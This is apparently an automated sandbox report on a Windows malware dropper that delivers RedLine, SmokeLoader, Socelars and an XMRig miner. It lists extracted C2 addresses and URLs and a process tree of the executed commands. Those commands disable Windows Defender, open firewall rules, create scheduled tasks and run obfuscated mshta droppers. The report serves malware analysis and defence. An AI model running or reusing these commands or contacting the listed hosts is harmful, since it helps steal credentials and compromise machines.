Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

022e3c30a1...66.exe

windows10_x64

10

4d27dca0a1...ef.exe

windows10_x64

10

578a3a7a2b...b3.exe

windows10_x64

10

9c4880a98c...82.exe

windows10_x64

10

a1dad4a83d...c4.exe

windows10_x64

10

acf1b7d80f...e0.exe

windows10_x64

10

cbf31d825a...d2.exe

windows10_x64

10

db76a117db...12.exe

windows10_x64

10

e2ffb8aeeb...f6.exe

windows10_x64

7

f2196668f4...cb.exe

windows10_x64

10

Resubmissions

10/11/2021, 14:50

211110-r7nbvaeddr 10

08/11/2021, 16:12

211108-tnmmbahgaj 10

08/11/2021, 15:26

211108-svdsbaccf6 10

08/11/2021, 14:48

211108-r6lfvshdfn 10

Analysis

  • max time kernel
    166s
  • max time network
    1210s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    08/11/2021, 15:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe

Score
10/10
redlinesmokeloadersocelarsxmrigchrisfucker2media20aspackv2backdoordiscoveryevasioninfostealerminerpersistencespywarestealerthemidatrojan

Malware Config

Extracted

Family

redline

Botnet

media20

C2

91.121.67.60:2151

Extracted

Family

redline

Botnet

Chris

C2

194.104.136.5:46013

Extracted

Family

redline

Botnet

fucker2

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

http://misha.at/upload/

http://roohaniinfra.com/upload/

http://0axqpcc.cn/upload/

http://mayak-lombard.ru/upload/

http://mebel-lass.ru/upload/

http://dishakhan.com/upload/
rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 24 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 8 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 3 IoCs
    evasion
  • Kills process with taskkill 10 IoCs
    evasion
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 20 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    evasionspywaretrojan
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1236
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
        PID:2372
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1880
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2708
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
              PID:2692
            • C:\Windows\Explorer.EXE
              C:\Windows\Explorer.EXE
              1⤵
              • Modifies registry class
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of AdjustPrivilegeToken
              PID:2960
              • C:\Users\Admin\AppData\Local\Temp\acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
                "C:\Users\Admin\AppData\Local\Temp\acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe"
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2700
                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:1948
                  • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\setup_install.exe
                    "C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\setup_install.exe"
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2240
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3172
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                        6⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1196
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3076
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                        6⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1696
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Wed09ed6b36e57df5f.exe
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2956
                      • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed09ed6b36e57df5f.exe
                        Wed09ed6b36e57df5f.exe
                        6⤵
                        • Executes dropped EXE
                        PID:436
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Wed0900caa0501dc98f.exe
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2832
                      • C:\Users\Admin\AppData\Local\Temp\7zSC971B5D5\Wed0900caa0501dc98f.exe
                        Wed0900caa0501dc98f.exe
                        6⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Modifies system certificate store
                        • Suspicious behavior: EnumeratesProcesses
                        PID:3100
                        • C:\Users\Admin\Pictures\Adobe Films\4BTU5QOTMU_6Blr1svoLlfGS.exe
                          "C:\Users\Admin\Pictures\Adobe Films\4BTU5QOTMU_6Blr1svoLlfGS.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:4180
                        • C:\Users\Admin\Pictures\Adobe Films\gyL3xcPA_EPUVQbxVO7k3z0T.exe
                          "C:\Users\Admin\Pictures\Adobe Films\gyL3xcPA_EPUVQbxVO7k3z0T.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:5036
                          • C:\Users\Admin\Pictures\Adobe Films\gyL3xcPA_EPUVQbxVO7k3z0T.exe
                            "C:\Users\Admin\Pictures\Adobe Films\gyL3xcPA_EPUVQbxVO7k3z0T.exe"
                            8⤵
                            • Executes dropped EXE
                            PID:4656
                        • C:\Users\Admin\Pictures\Adobe Films\zS7apgUtMBmsS0Zxc3XQymcW.exe
                          "C:\Users\Admin\Pictures\Adobe Films\zS7apgUtMBmsS0Zxc3XQymcW.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:5024
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 400
                            8⤵
                            • Program crash
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4412
                        • C:\Users\Admin\Pictures\Adobe Films\8v4B0LW4zQqoSOa4URFxuoWe.exe
                          "C:\Users\Admin\Pictures\Adobe Films\8v4B0LW4zQqoSOa4URFxuoWe.exe"
                          7⤵
                          • Executes dropped EXE
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4980
                        • C:\Users\Admin\Pictures\Adobe Films\SxDAz8TC5bEQdVwolIqWp05m.exe
                          "C:\Users\Admin\Pictures\Adobe Films\SxDAz8TC5bEQdVwolIqWp05m.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4240
                        • C:\Users\Admin\Pictures\Adobe Films\yLOTKET8Nom_Puv0ALj7YIk4.exe
                          "C:\Users\Admin\Pictures\Adobe Films\yLOTKET8Nom_Puv0ALj7YIk4.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5084
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c taskkill /f /im chrome.exe
                            8⤵
                              PID:4352
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im chrome.exe
                                9⤵
                                • Kills process with taskkill
                                PID:7884
                          • C:\Users\Admin\Pictures\Adobe Films\iao08xNz88NsJnYlmgNwZsl5.exe
                            "C:\Users\Admin\Pictures\Adobe Films\iao08xNz88NsJnYlmgNwZsl5.exe"
                            7⤵
                            • Executes dropped EXE
                            • Drops file in Program Files directory
                            PID:1940
                            • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                              "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                              8⤵
                              • Executes dropped EXE
                              PID:5536
                          • C:\Users\Admin\Pictures\Adobe Films\hgz8mbKP4AlYG0AVewGMNzHw.exe
                            "C:\Users\Admin\Pictures\Adobe Films\hgz8mbKP4AlYG0AVewGMNzHw.exe"
                            7⤵
                            • Executes dropped EXE
                            • Drops file in Program Files directory
                            PID:4776
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                              8⤵
                              • Creates scheduled task(s)
                              PID:6688
                            • C:\Windows\SysWOW64\schtasks.exe
                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                              8⤵
                              • Creates scheduled task(s)
                              PID:5592
                            • C:\Users\Admin\Documents\jL_2M1YlICowIwJu3282Sh50.exe
                              "C:\Users\Admin\Documents\jL_2M1YlICowIwJu3282Sh50.exe"
                              8⤵
                                PID:6260
                                • C:\Users\Admin\Pictures\Adobe Films\eMwKXVzfy5yIIMR0oWLqMWdn.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\eMwKXVzfy5yIIMR0oWLqMWdn.exe"
                                  9⤵
                                    PID:4564
                                  • C:\Users\Admin\Pictures\Adobe Films\mnRy0vXUEAOKJPeec2QQDoNn.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\mnRy0vXUEAOKJPeec2QQDoNn.exe"
                                    9⤵
                                      PID:5972
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "mnRy0vXUEAOKJPeec2QQDoNn.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mnRy0vXUEAOKJPeec2QQDoNn.exe" & exit
                                        10⤵
                                          PID:1444
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            11⤵
                                              PID:7936
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im "mnRy0vXUEAOKJPeec2QQDoNn.exe" /f
                                              11⤵
                                              • Kills process with taskkill
                                              PID:4940
                                        • C:\Users\Admin\Pictures\Adobe Films\_Bn_Zs_VNYSejT4kT2eQh0QK.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\_Bn_Zs_VNYSejT4kT2eQh0QK.exe"
                                          9⤵
                                            PID:5312
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              10⤵
                                                PID:7288
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  11⤵
                                                  • Kills process with taskkill
                                                  PID:7992
                                            • C:\Users\Admin\Pictures\Adobe Films\CxEr8Zx5GWP79LixdBaazFqx.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\CxEr8Zx5GWP79LixdBaazFqx.exe"
                                              9⤵
                                                PID:6568
                                              • C:\Users\Admin\Pictures\Adobe Films\KLBMLXPv9rDaBJyE5F_vRQ2d.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\KLBMLXPv9rDaBJyE5F_vRQ2d.exe"
                                                9⤵
                                                  PID:1380
                                                  • C:\Windows\SysWOW64\mshta.exe
                                                    "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\KLBMLXPv9rDaBJyE5F_vRQ2d.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\KLBMLXPv9rDaBJyE5F_vRQ2d.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                    10⤵
                                                      PID:7652
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\KLBMLXPv9rDaBJyE5F_vRQ2d.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\KLBMLXPv9rDaBJyE5F_vRQ2d.exe" ) do taskkill -f -iM "%~NxM"
                                                        11⤵
                                                          PID:6524
                                                          • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                            ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                            12⤵
                                                              PID:8028
                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                13⤵
                                                                  PID:7468
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                    14⤵
                                                                      PID:4464
                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                    "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                    13⤵
                                                                      PID:8116
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                        14⤵
                                                                          PID:5296
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                            15⤵
                                                                              PID:4000
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                              15⤵
                                                                                PID:4132
                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                msiexec -Y ..\lXQ2g.WC
                                                                                15⤵
                                                                                  PID:1364
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill -f -iM "KLBMLXPv9rDaBJyE5F_vRQ2d.exe"
                                                                            12⤵
                                                                            • Kills process with taskkill
                                                                            PID:7880
                                                                    • C:\Users\Admin\Pictures\Adobe Films\87yzuAlNDMpQ51c2WDkmH7UW.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\87yzuAlNDMpQ51c2WDkmH7UW.exe"
                                                                      9⤵
                                                                        PID:5348
                                                                      • C:\Users\Admin\Pictures\Adobe Films\8LfdYbgZksT4a9sYGAHGqadi.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\8LfdYbgZksT4a9sYGAHGqadi.exe"
                                                                        9⤵
                                                                          PID:1512
                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                            C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                            10⤵
                                                                              PID:6672
                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"
                                                                                11⤵
                                                                                  PID:1960
                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff84ac7dec0,0x7ff84ac7ded0,0x7ff84ac7dee0
                                                                                    12⤵
                                                                                      PID:7932
                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff6e4f19e70,0x7ff6e4f19e80,0x7ff6e4f19e90
                                                                                        13⤵
                                                                                          PID:6580
                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,1266544784040503572,14983392505238366995,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1960_577502325" --mojo-platform-channel-handle=1652 /prefetch:8
                                                                                        12⤵
                                                                                          PID:7404
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\yl_66f8LwSIvZSI2XcuNoWSE.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\yl_66f8LwSIvZSI2XcuNoWSE.exe"
                                                                                    9⤵
                                                                                      PID:7024
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\yl_66f8LwSIvZSI2XcuNoWSE.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\yl_66f8LwSIvZSI2XcuNoWSE.exe" -u
                                                                                        10⤵
                                                                                          PID:4356
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\e8r5vu9shIooUrlc4nz0AU8h.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\e8r5vu9shIooUrlc4nz0AU8h.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5324
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\QtYlWyulCi68vMOUjopLkEGO.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\QtYlWyulCi68vMOUjopLkEGO.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5316
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\tUDPHIDN_1Ea19xs4CbAHd7y.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\tUDPHIDN_1Ea19xs4CbAHd7y.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:5292
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\6Ah25ezLdMvzCseh05ik4pku.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\6Ah25ezLdMvzCseh05ik4pku.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in Windows directory
                                                                                    PID:5268
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                      8⤵
                                                                                        PID:5856
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                        8⤵
                                                                                          PID:6256
                                                                                        • C:\Windows\System32\netsh.exe
                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                          8⤵
                                                                                            PID:4784
                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                            schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                            8⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:6000
                                                                                          • C:\Windows\System32\netsh.exe
                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                            8⤵
                                                                                              PID:6448
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                9⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5724
                                                                                            • C:\Windows\System\svchost.exe
                                                                                              "C:\Windows\System\svchost.exe" formal
                                                                                              8⤵
                                                                                              • Drops file in Windows directory
                                                                                              PID:6060
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                9⤵
                                                                                                  PID:7116
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                  9⤵
                                                                                                    PID:1112
                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                    9⤵
                                                                                                      PID:5860
                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                      9⤵
                                                                                                        PID:6464
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\Hd0ydy0xVdFb_Sj8wZ9Ndzlq.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\Hd0ydy0xVdFb_Sj8wZ9Ndzlq.exe"
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5308
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\86lFNmzXILj2OHtDm9x91DsZ.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\86lFNmzXILj2OHtDm9x91DsZ.exe"
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5300
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2288
                                                                                                      • C:\Users\Admin\AppData\Local\3534846.exe
                                                                                                        "C:\Users\Admin\AppData\Local\3534846.exe"
                                                                                                        9⤵
                                                                                                          PID:7332
                                                                                                        • C:\Users\Admin\AppData\Local\663087.exe
                                                                                                          "C:\Users\Admin\AppData\Local\663087.exe"
                                                                                                          9⤵
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          PID:7704
                                                                                                        • C:\Users\Admin\AppData\Local\4741445.exe
                                                                                                          "C:\Users\Admin\AppData\Local\4741445.exe"
                                                                                                          9⤵
                                                                                                            PID:7980
                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                              "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL" ). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\4741445.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\4741445.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ) )
                                                                                                              10⤵
                                                                                                                PID:7244
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
